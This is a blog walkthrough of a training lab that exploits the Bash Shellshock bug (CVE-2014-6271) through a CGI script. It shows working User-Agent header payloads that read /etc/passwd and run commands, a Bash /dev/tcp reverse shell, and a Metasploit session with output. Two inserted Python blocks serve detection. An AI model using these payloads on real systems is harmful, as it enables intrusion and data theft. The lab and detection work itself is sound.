Exploiting Bash CVE-2014-6271 Vulnerability (Shellshock)

Posted by r3kind1e on October 17, 2022


CVE-2014-6271 - Shellshock

Shellshock (CVE-2014-6271) is the name given to a family of vulnerabilities in the Bash shell (since V1.3) that allow an attacker to execute arbitrary commands remotely via Bash, which in turn can give the attacker remote access to the target system through a reverse shell.

The Shellshock vulnerability was discovered by Stephane Chazelas on the 12th of September 2014 and was made public on the 24th of September 2014.

Bash is a *Nix shell that is part of the GNU project and is the default shell for most Linux distributions.

The Shellshock vulnerability is caused by a flaw in the way Bash parses function definitions passed in through environment variables: Bash mistakenly executes any trailing commands that follow the character sequence () { :; };

This vulnerability only affects Linux, as Windows does not use Bash because it is not a *Nix based operating system.

In this context of remote exploitation, Apache web servers configured to run CGI scripts or .sh scripts are also vulnerable to this attack.

CGI (Common Gateway Interface) scripts are used by Apache to execute programs and commands on the Linux system, after which the output is returned to the client.

Shellshock Exploitation

In order to exploit this vulnerability, you will need to locate an input vector or script that allows you to communicate with Bash.

In the context of an Apache web server, we can utilize any legitimate CGI scripts accessible on the web server.

Whenever a CGI script is executed, the web server will initiate a new process and run the CGI script with Bash.

This vulnerability can be exploited both manually and automatically with the use of an MSF exploit module.

There is a vulnerability within Bash in the way it handles function declarations passed through environment variables. If the () { :; }; characters are fed into Bash this way, any other commands placed after these special characters will be executed by Bash.

If you are running an Apache web server hosting a web application, regardless of whether it is PHP or HTML, you can create a CGI script to obtain information from the system. If I want to get the current time on a Linux server, I can use a CGI script to execute the time command and redirect the output to the web page.

If the attacker is able to reach the CGI script, then in the case of this vulnerability they can pass in this special set of characters together with an additional command of their choosing, and so potentially use the vulnerability to execute arbitrary commands that could be malicious.

Because these scripts interact with Bash, or get Bash to execute some commands, we can send a request to the CGI script that carries the special characters as input, followed by any other commands we would like to execute.

Whenever we make an HTTP request for that particular CGI script, the web server will initiate a new process and run the CGI script with Bash. So we can place these special characters within one of the HTTP headers, since the server copies request headers into the environment of the new process. The most effective technique is to put the characters in the User-Agent HTTP header and then specify the commands we would like to execute after them.
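To make the header-to-environment path concrete, here is an added Python example (my own illustration, not code from the course or the original post). It models the CGI mapping of request headers into HTTP_* environment variables, flags any value that begins with the function-definition prefix a vulnerable Bash would act on, and runs the same check over a few constructed Apache combined-format access-log lines. The log lines, the IP addresses in them and the prefix regex are assumptions of this example.

```python
"""Added example (not from the original post): trace how an HTTP header reaches
Bash's environment under CGI and flag values carrying the Shellshock prefix."""
import re
from typing import Dict, List, Tuple


def cgi_env_from_headers(headers: Dict[str, str]) -> Dict[str, str]:
    """Mirror the CGI (RFC 3875) rule: each request header becomes HTTP_<NAME>,
    upper-cased with '-' turned into '_', and its value is copied verbatim.
    This is how a User-Agent string ends up in the CGI process's environment
    as HTTP_USER_AGENT."""
    env: Dict[str, str] = {}
    for name, value in headers.items():
        env["HTTP_" + name.upper().replace("-", "_")] = value
    return env


# A vulnerable Bash treats an environment value that starts with "() {" as a
# function definition and keeps parsing past the closing brace; that is the
# whole bug.  The pattern tolerates the whitespace variants seen in the wild
# ("(){", "() {").  It is an assumption of this example, not an official rule.
SHELLSHOCK_PREFIX = re.compile(r"^\s*\(\s*\)\s*\{")


def is_shellshock_value(value: str) -> bool:
    """True when the value would be parsed by a vulnerable Bash as a function."""
    return bool(SHELLSHOCK_PREFIX.match(value))


def find_shellshock_headers(headers: Dict[str, str]) -> List[str]:
    """Return the CGI variable names whose values carry the prefix.
    A pre-exec check like this is the kind of filter mod_security rules applied."""
    env = cgi_env_from_headers(headers)
    return sorted(k for k, v in env.items() if is_shellshock_value(v))


# Apache "combined" format quotes the User-Agent as the last field, so the same
# prefix can be hunted in access logs after the fact.
COMBINED_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
    r'(?P<status>\d{3}) \S+ "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"'
)


def scan_access_log(lines: List[str]) -> List[Tuple[str, str, str]]:
    """Return (client ip, request line, user-agent) for every log line whose
    User-Agent starts with the Shellshock prefix."""
    hits = []
    for line in lines:
        m = COMBINED_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than guess
        ua = m.group("ua")
        if is_shellshock_value(ua):
            hits.append((m.group("ip"), m.group("req"), ua))
    return hits


# Constructed sample log lines (addresses from the documentation range).
SAMPLE_LOG = [
    '192.0.2.10 - - [17/Oct/2022:09:40:49 +0000] "GET /gettime.cgi HTTP/1.1" 200 46 "-" '
    '"Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0"',
    '192.0.2.10 - - [17/Oct/2022:09:41:02 +0000] "GET /gettime.cgi HTTP/1.1" 200 46 "-" '
    '"() { :; }; echo; echo; /bin/bash -c \'id\'"',
    '192.0.2.11 - - [17/Oct/2022:09:42:30 +0000] "GET /index.html HTTP/1.1" 200 1234 "-" "curl/7.68.0"',
]


if __name__ == "__main__":
    headers = {"User-Agent": "() { :; }; echo; echo; /bin/bash -c 'id'", "Accept": "*/*"}
    print("CGI environment:", cgi_env_from_headers(headers))
    print("Tainted variables:", find_shellshock_headers(headers))
    for ip, req, ua in scan_access_log(SAMPLE_LOG):
        print(f"{ip} {req!r} UA={ua!r}")
```

Note that the log-side check only sees headers Apache actually logs; a payload in a header such as Referer or Cookie is still delivered to the CGI process but would not appear in a default combined-format log, which is why the pre-exec environment check is the more complete of the two.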

Demo: Exploiting Bash CVE-2014-6271 Vulnerability (Shellshock)

ifconfig

eth1: inet 192.24.241.2 
nmap -sV 192.24.241.3

Visit in the browser:

192.24.241.3 

View Page Source

192.24.241.3/gettime.cgi
nmap -sV 192.24.241.3 --script=http-shellshock --script-args "http-shellshock.uri=/gettime.cgi"

Switch FoxyProxy to Burp Suite. In the applications menu, choose 03-Web Application Analysis -> burpsuite.

Proxy->Intercept->Intercept is on->Forward->Reload->Send to Repeater

User-Agent: () { :; }; echo; echo; /bin/bash -c 'cat /etc/passwd'

Gain a reverse shell on the target system. We can utilize Bash to connect to a listener on our Kali system.

nc -nvlp 1234

Connecting with Bash to our listener.

ifconfig
User-Agent: () { :; }; echo; echo; /bin/bash -c 'bash -i>&/dev/tcp/192.24.241.2/1234 0>&1'

We should get a reverse shell on our listener.

daemon@victim-1:/opt/apache/htdocs$ whoami

Get information about the distribution.

daemon@victim-1:/opt/apache/htdocs$ cat /etc/*issue

Kernel information:

daemon@victim-1:/opt/apache/htdocs$ uname -a

That is how to exploit this vulnerability manually using Burp Proxy.

How to exploit this vulnerability with the Metasploit Framework.

service postgresql start && msfconsole

search shellshock
use exploit/multi/http/apache_mod_cgi_bash_env_exec
show options
set RHOSTS 192.24.241.3
set TARGETURI /gettime.cgi
exploit

meterpreter > sysinfo

Shellshock

Overview

OWASP Top 10 is an awareness document that outlines the most critical security risks to web applications. Penetration tests are carried out against the OWASP Top 10 standard in order to reduce or mitigate those risks.

In this exercise we focus on OWASP A9, Using Components with Known Vulnerabilities, and perform an attack against a web server vulnerable to CVE-2014-6071.

Objective: exploit the vulnerability and execute arbitrary commands on the target machine.

Instructions:

This lab is dedicated to you! There are no other users on this network :)

Once you start the lab, you will have access to a Kali GUI instance.

Your Kali instance has an interface with the IP address 192.X.Y.2. Run "ip addr" to find the values of X and Y.

Do not attack the gateway located at IP address 192.X.Y.1.

My own approach

root@attackdefense:~# ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 10.1.0.6  netmask 255.255.0.0  broadcast 10.1.255.255
        ether 02:42:0a:01:00:06  txqueuelen 0  (Ethernet)
        RX packets 2427  bytes 237106 (231.5 KiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 2044  bytes 2228288 (2.1 MiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

eth1: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 192.63.27.2  netmask 255.255.255.0  broadcast 192.63.27.255
        ether 02:42:c0:3f:1b:02  txqueuelen 0  (Ethernet)
        RX packets 17  bytes 1486 (1.4 KiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 0  bytes 0 (0.0 B)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 10865  bytes 27489009 (26.2 MiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 10865  bytes 27489009 (26.2 MiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

root@attackdefense:~# nmap -sV 192.63.27.3
Starting Nmap 7.70 ( https://nmap.org ) at 2022-10-17 09:09 IST
Nmap scan report for target-1 (192.63.27.3)
Host is up (0.000010s latency).
Not shown: 999 closed ports
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.6 ((Unix))
MAC Address: 02:42:C0:3F:1B:03 (Unknown)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.52 seconds

http-shellshock

http://192.63.27.3/gettime.cgi
nmap -sV --script http-shellshock --script-args uri=/gettime.cgi 192.63.27.3
root@attackdefense:~# nmap -sV --script http-shellshock --script-args uri=/gettime.cgi 192.63.27.3
Starting Nmap 7.70 ( https://nmap.org ) at 2022-10-17 09:22 IST
Nmap scan report for target-1 (192.63.27.3)
Host is up (0.000010s latency).
Not shown: 999 closed ports
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.6 ((Unix))
|_http-server-header: Apache/2.4.6 (Unix)
| http-shellshock: 
|   VULNERABLE:
|   HTTP Shellshock vulnerability
|     State: VULNERABLE (Exploitable)
|     IDs:  CVE:CVE-2014-6271
|       This web application might be affected by the vulnerability known as Shellshock. It seems the server
|       is executing commands injected via malicious HTTP headers.
|             
|     Disclosure date: 2014-09-24
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7169
|       http://www.openwall.com/lists/oss-security/2014/09/24/10
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271
|_      http://seclists.org/oss-sec/2014/q3/685
MAC Address: 02:42:C0:3F:1B:03 (Unknown)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.53 seconds

GET /gettime.cgi HTTP/1.1
Host: 192.63.27.3
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
() { :; }; echo; echo; /bin/bash -c 'cat /etc/passwd'
GET /gettime.cgi HTTP/1.1
Host: 192.63.27.3
User-Agent: () { :; }; echo; echo; /bin/bash -c 'cat /etc/passwd'
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
HTTP/1.1 200 OK
Date: Mon, 17 Oct 2022 03:58:07 GMT
Server: Apache/2.4.6 (Unix)
Connection: close
Content-Length: 957


root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
libuuid:x:100:101::/var/lib/libuuid:
syslog:x:101:104::/home/syslog:/bin/false
GET /gettime.cgi HTTP/1.1
Host: 192.151.67.3
User-Agent: () { :; }; echo; echo; /bin/bash -c 'id'
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.151.67.3/
Connection: close
HTTP/1.1 200 OK
Date: Mon, 17 Oct 2022 09:40:49 GMT
Server: Apache/2.4.6 (Unix)
Connection: close
Content-Length: 46


uid=1(daemon) gid=1(daemon) groups=1(daemon)
GET /gettime.cgi HTTP/1.1
Host: 192.151.67.3
User-Agent: () { :; }; echo; echo; /bin/bash -c 'ps -ef'
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.151.67.3/
Connection: close
HTTP/1.1 200 OK
Date: Mon, 17 Oct 2022 09:43:17 GMT
Server: Apache/2.4.6 (Unix)
Connection: close
Content-Length: 555


UID          PID    PPID  C STIME TTY          TIME CMD
root           1       0  0 09:27 ?        00:00:00 /usr/bin/python /usr/bin/supervisord -n
root          10       1  0 09:27 ?        00:00:00 /bin/bash /root/startup.sh
daemon        11      10  0 09:27 ?        00:00:00 /opt/apache/bin/httpd -X
daemon        12      11  0 09:27 ?        00:00:00 /opt/apache/bin/httpd -X
daemon      1034      12  0 09:43 ?        00:00:00 /usr/local/bash-4.3.0/bin/bash /opt/apache/htdocs/gettime.cgi
daemon      1035    1034  0 09:43 ?        00:00:00 ps -ef
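From the defender's side, the process list above is the clearest host-level trace of the attack: the bash process that Apache started to run gettime.cgi has spawned a command the script never runs. The following added Python example (not part of the lab or its walkthrough) parses ps -ef output, reconstructs the parent/child chain and reports every process under httpd that is not the expected CGI script. The sample listing is constructed to mirror the one above plus one extra interactive bash child, and the allow-list EXPECTED_CGI is an assumption of this example.

```python
"""Added example (not from the lab): hunt for unexpected processes under the
web server by walking the PPID chain in `ps -ef` output."""
from typing import Callable, Dict, List, Tuple

# Constructed sample, modelled on the listing in the writeup with one extra
# "bash -i" child to stand in for a reverse shell.
SAMPLE_PS = """\
UID          PID    PPID  C STIME TTY          TIME CMD
root           1       0  0 09:27 ?        00:00:00 /usr/bin/python /usr/bin/supervisord -n
root          10       1  0 09:27 ?        00:00:00 /bin/bash /root/startup.sh
daemon        11      10  0 09:27 ?        00:00:00 /opt/apache/bin/httpd -X
daemon        12      11  0 09:27 ?        00:00:00 /opt/apache/bin/httpd -X
daemon      1034      12  0 09:43 ?        00:00:00 /usr/local/bash-4.3.0/bin/bash /opt/apache/htdocs/gettime.cgi
daemon      1035    1034  0 09:43 ?        00:00:00 ps -ef
daemon      1036    1034  0 09:43 ?        00:00:00 bash -i
"""

# Commands the web server is allowed to launch (assumed allow-list).
EXPECTED_CGI = {"/opt/apache/htdocs/gettime.cgi"}

# PID -> (PPID, UID, CMD)
ProcTable = Dict[int, Tuple[int, str, str]]


def parse_ps(text: str) -> ProcTable:
    """Parse `ps -ef` output.  The first seven columns never contain spaces,
    so splitting at most seven times keeps the full CMD intact."""
    procs: ProcTable = {}
    for line in text.splitlines()[1:]:  # skip the header row
        parts = line.split(None, 7)
        if len(parts) < 8:
            continue
        uid, pid, ppid, _c, _stime, _tty, _time, cmd = parts
        procs[int(pid)] = (int(ppid), uid, cmd)
    return procs


def descends_from(procs: ProcTable, pid: int, pred: Callable[[str], bool]) -> bool:
    """Walk up the parent chain from pid; True if any ancestor's CMD satisfies pred.
    A 'seen' set guards against cycles in malformed input."""
    seen = set()
    while pid in procs and pid not in seen:
        seen.add(pid)
        ppid, _uid, cmd = procs[pid]
        if pred(cmd):
            return True
        pid = ppid
    return False


def is_httpd(cmd: str) -> bool:
    return "httpd" in cmd.split()[0] if cmd else False


def suspicious_web_children(procs: ProcTable) -> List[Tuple[int, str, str]]:
    """Every process under httpd whose command line is neither httpd itself
    nor the expected CGI script.  Returns (pid, uid, cmd) sorted by pid."""
    hits = []
    for pid, (ppid, uid, cmd) in procs.items():
        if is_httpd(cmd):
            continue
        if not descends_from(procs, ppid, is_httpd):
            continue
        # The CGI wrapper ("bash /path/script.cgi") is legitimate; anything
        # else under the web server, including children of that wrapper, is not.
        if any(arg in EXPECTED_CGI for arg in cmd.split()):
            continue
        hits.append((pid, uid, cmd))
    return sorted(hits)


if __name__ == "__main__":
    for pid, uid, cmd in suspicious_web_children(parse_ps(SAMPLE_PS)):
        print(f"suspicious pid={pid} uid={uid} cmd={cmd!r}")
```

The same logic applies to a live host (feed it the output of ps -ef) or to triage of a captured process list; in the lab listing it singles out the ps -ef child, and it would equally single out the bash -i reverse shell from the later step of the writeup.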
root@attackdefense:~# nc -nlvp 1234
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::1234
Ncat: Listening on 0.0.0.0:1234

The network went down, so I restarted the lab.

root@attackdefense:~# ifconfig
eth1: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 192.181.17.2  netmask 255.255.255.0  broadcast 192.181.17.255
        ether 02:42:c0:b5:11:02  txqueuelen 0  (Ethernet)
GET /gettime.cgi HTTP/1.1
Host: 192.181.17.3
User-Agent: () { :; }; echo; echo; /bin/bash -c 'bash -i>&/dev/tcp/192.181.17.2/1234 0>&1'
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
root@attackdefense:~# nc -nlvp 1234
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::1234
Ncat: Listening on 0.0.0.0:1234
Ncat: Connection from 192.181.17.3.
Ncat: Connection from 192.181.17.3:42242.
bash: cannot set terminal process group (10): Inappropriate ioctl for device
bash: no job control in this shell
daemon@victim-1:/opt/apache/htdocs$ whoami
whoami
daemon
daemon@victim-1:/opt/apache/htdocs$ cat /etc/*issue
cat /etc/*issue
Ubuntu 14.04.6 LTS \n \l

daemon@victim-1:/opt/apache/htdocs$ uname -a
uname -a
Linux victim-1 5.4.0-125-generic #141-Ubuntu SMP Wed Aug 10 13:42:03 UTC 2022 x86_64 x86_64 x86_64 GNU/Linux
root@attackdefense:~# service postgresql start && msfconsole -q
Starting PostgreSQL 12 database server: main.
msf5 > search shellshock

Matching Modules
================

   #   Name                                               Disclosure Date  Rank       Check  Description
   -   ----                                               ---------------  ----       -----  -----------
   0   auxiliary/scanner/http/apache_mod_cgi_bash_env     2014-09-24       normal     Yes    Apache mod_cgi Bash Environment Variable Injection (Shellshock) Scanner
   1   auxiliary/server/dhclient_bash_env                 2014-09-24       normal     No     DHCP Client Bash Environment Variable Code Injection (Shellshock)
   2   exploit/linux/http/advantech_switch_bash_env_exec  2015-12-01       excellent  Yes    Advantech Switch Bash Environment Variable Code Injection (Shellshock)
   3   exploit/linux/http/ipfire_bashbug_exec             2014-09-29       excellent  Yes    IPFire Bash Environment Variable Injection (Shellshock)
   4   exploit/multi/ftp/pureftpd_bash_env_exec           2014-09-24       excellent  Yes    Pure-FTPd External Authentication Bash Environment Variable Code Injection (Shellshock)
   5   exploit/multi/http/apache_mod_cgi_bash_env_exec    2014-09-24       excellent  Yes    Apache mod_cgi Bash Environment Variable Code Injection (Shellshock)
   6   exploit/multi/http/cups_bash_env_exec              2014-09-24       excellent  Yes    CUPS Filter Bash Environment Variable Code Injection (Shellshock)
   7   exploit/multi/misc/legend_bot_exec                 2015-04-27       excellent  Yes    Legend Perl IRC Bot Remote Code Execution
   8   exploit/multi/misc/xdh_x_exec                      2015-12-04       excellent  Yes    Xdh / LinuxNet Perlbot / fBot IRC Bot Remote Code Execution
   9   exploit/osx/local/vmware_bash_function_root        2014-09-24       normal     Yes    OS X VMWare Fusion Privilege Escalation via Bash Environment Code Injection (Shellshock)
   10  exploit/unix/dhcp/bash_environment                 2014-09-24       excellent  No     Dhclient Bash Environment Variable Injection (Shellshock)
   11  exploit/unix/smtp/qmail_bash_env_exec              2014-09-24       normal     No     Qmail SMTP Bash Environment Variable Injection (Shellshock)


msf5 > use exploit/multi/http/apache_mod_cgi_bash_env_exec
msf5 exploit(multi/http/apache_mod_cgi_bash_env_exec) > show options

Module options (exploit/multi/http/apache_mod_cgi_bash_env_exec):

   Name            Current Setting  Required  Description
   ----            ---------------  --------  -----------
   CMD_MAX_LENGTH  2048             yes       CMD max line length
   CVE             CVE-2014-6271    yes       CVE to check/exploit (Accepted: CVE-2014-6271, CVE-2014-6278)
   HEADER          User-Agent       yes       HTTP header to use
   METHOD          GET              yes       HTTP method to use
   Proxies                          no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                           yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPATH           /bin             yes       Target PATH for binaries used by the CmdStager
   RPORT           80               yes       The target port (TCP)
   SRVHOST         0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT         8080             yes       The local port to listen on.
   SSL             false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                          no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI                        yes       Path to CGI script
   TIMEOUT         5                yes       HTTP read response timeout (seconds)
   URIPATH                          no        The URI to use for this exploit (default is random)
   VHOST                            no        HTTP server virtual host


Exploit target:

   Id  Name
   --  ----
   0   Linux x86


msf5 exploit(multi/http/apache_mod_cgi_bash_env_exec) > set rhosts 192.181.17.3
rhosts => 192.181.17.3
msf5 exploit(multi/http/apache_mod_cgi_bash_env_exec) > set targeturi /gettime.cgi
targeturi => /gettime.cgi
msf5 exploit(multi/http/apache_mod_cgi_bash_env_exec) > exploit

[*] Started reverse TCP handler on 192.181.17.2:4444 
[*] Command Stager progress - 100.46% done (1097/1092 bytes)
[*] Sending stage (985320 bytes) to 192.181.17.3
[*] Meterpreter session 1 opened (192.181.17.2:4444 -> 192.181.17.3:57322) at 2022-10-17 10:06:35 +0530

meterpreter > sysinfo
Computer     : 192.181.17.3
OS           : Ubuntu 14.04 (Linux 5.4.0-125-generic)
Architecture : x64
BuildTuple   : i486-linux-musl
Meterpreter  : x86/linux
meterpreter > getuid
Server username: uid=1, gid=1, euid=1, egid=1
meterpreter > 

Solution

The solution to this lab can be found in the following manual: https://assets.ine.com/labs/ad-manuals/walkthrough-1911.pdf

exploit-CVE-2014-6271